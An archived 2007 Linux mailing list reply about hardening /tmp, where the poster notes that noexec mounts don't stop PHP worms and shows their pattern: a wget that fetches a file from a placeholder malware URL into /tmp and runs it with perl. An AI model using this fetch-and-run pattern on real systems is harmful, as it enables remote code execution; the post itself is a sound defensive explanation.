LISTSERV mailing list manager LISTSERV 16.0

Help for LINUX-L Archives


LINUX-L Archives

LINUX-L Archives


LINUX-L@LISTS.UFL.EDU


View:

Message:

[

First

|

Previous

|

Next

|

Last

]

By Topic:

[

First

|

Previous

|

Next

|

Last

]

By Author:

[

First

|

Previous

|

Next

|

Last

]

Font:

Monospaced Font

LISTSERV Archives

LISTSERV Archives

LINUX-L Home

LINUX-L Home

LINUX-L  2007

LINUX-L 2007

Subject:

Re: protecting /tmp

From:

Jon Lewis <[log in to unmask]>

Reply-To:

Platform Independent Linux List! <[log in to unmask]>

Date:

Tue, 2 Jan 2007 09:08:13 -0500

Content-Type:

TEXT/PLAIN

Parts/Attachments:

Parts/Attachments

TEXT/PLAIN (18 lines)

On Tue, 2 Jan 2007, Jan Hendrik Grahl wrote:

> A little late, but maybe someone else finds this interesting, too.
> Another hint I read about once was to remove executable functionality from
> places where it isn't needed. In this example you could have /tmp on a
> separate partition and enable the nosuid,noexec flags (see man mount).

Thats good practice, but won't stop things like PHP worms which
effectively do:

wget -O /tmp/a $malwareurl
perl /tmp/a

----------------------------------------------------------------------
  Jon Lewis | I route
  Senior Network Engineer | therefore you are
  Atlantic Net |
_________ http://www.lewis.org/~jlewis/pgp for PGP public key_________

Top of Message | Previous Page | Permalink

Advanced Options


Options

Log In

Log In

Get Password

Get Password


Search Archives

Search Archives


Subscribe or Unsubscribe

Subscribe or Unsubscribe


Archives

2020
2019
2018
2017
2016
2015
2014
2013
2012
2011
2010
2009
2008
2007
2006
2005
2004
2003
2002
2001
2000
1999
1998
1997

ATOM RSS1 RSS2



LISTS.UFL.EDU

CataList Email List Search Powered by the LISTSERV Email List Manager